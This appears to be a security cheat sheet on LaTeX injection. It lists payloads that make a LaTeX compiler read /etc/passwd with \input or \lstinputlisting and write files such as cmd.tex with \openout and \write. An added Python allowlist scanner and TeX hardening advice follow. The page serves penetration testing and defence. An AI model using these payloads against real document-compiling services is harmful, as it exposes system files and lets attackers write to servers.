LaTeX Injection

LaTeX is a software system for document preparation. An application that compiles untrusted LaTeX input may be vulnerable to arbitrary command injection or path traversal.

- [LaTeX Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection)
- [formula-doc-latex-injection](https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection)

Payloads - Read Files

```latex
% Read file
\input{/etc/passwd}
$\input{/etc/passwd}$
$$\input{/etc/passwd}$$

\include{example} % Read example.tex
$\include{example}$
$$\include{example}$$

\lstinputlisting{/etc/passwd}
$\lstinputlisting{/etc/passwd}$
$$\lstinputlisting{/etc/passwd}$$
```


Payloads - Write File

```latex
\newwrite\outfile
$\newwrite\outfile$
$$\newwrite\outfile$$

\openout\outfile=cmd.tex
$\openout\outfile=cmd.tex$
$$\openout\outfile=cmd.tex$$

\write\outfile{Hello-World}
$\write\outfile{Hello-World}$
$$\write\outfile{Hello-World}$$
```
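
A defensive pre-compilation check for the primitives listed in both payload sections, as an added example that is not part of the original page: it rejects any control word outside an allowlist and labels the page's file-read and file-write commands. The `ALLOWED` set, the function names and the sample inputs are assumptions for a renderer that only accepts formulas.

```python
import re

# Primitives listed on this page, grouped by effect.
FILE_READ = {"input", "include", "lstinputlisting"}
FILE_WRITE = {"newwrite", "openout", "write"}
# Assumption: the application only renders formulas, so a short allowlist is enough.
ALLOWED = {"frac", "sqrt", "sum", "int", "alpha", "beta", "cdot", "left", "right"}

# A backslash followed by letters; "@" is included so internal macro names
# are captured whole and rejected as not-allowlisted.
CONTROL_WORD = re.compile(r"\\([A-Za-z@]+)")


def scan_latex(source):
    """Return (line_no, command, reason) for every control word to reject.

    Comments and escaped backslashes are scanned too: a false positive is
    cheaper than a missed primitive, so the check fails closed.
    """
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for match in CONTROL_WORD.finditer(line):
            name = match.group(1)
            if name in FILE_READ:
                findings.append((line_no, name, "file-read"))
            elif name in FILE_WRITE:
                findings.append((line_no, name, "file-write"))
            elif name not in ALLOWED:
                findings.append((line_no, name, "not-allowlisted"))
    return findings


def is_safe(source):
    """True only when every control word in the input is allowlisted."""
    return not scan_latex(source)


# Constructed sample submissions (not real user data).
FORMULA = r"$\frac{a}{b} + \sqrt{x}$"
READ_ATTEMPT = r"$$\lstinputlisting{/etc/passwd}$$"
WRITE_ATTEMPT = "\\newwrite\\outfile\n\\openout\\outfile=cmd.tex\n\\write\\outfile{Hello-World}"

if __name__ == "__main__":
    for sample in (FORMULA, READ_ATTEMPT, WRITE_ATTEMPT):
        print(is_safe(sample), scan_latex(sample))
```

Treat this as a first gate only: also compile with TeX's own file restrictions (`openin_any` and `openout_any` in `texmf.cnf`) and with shell escape disabled.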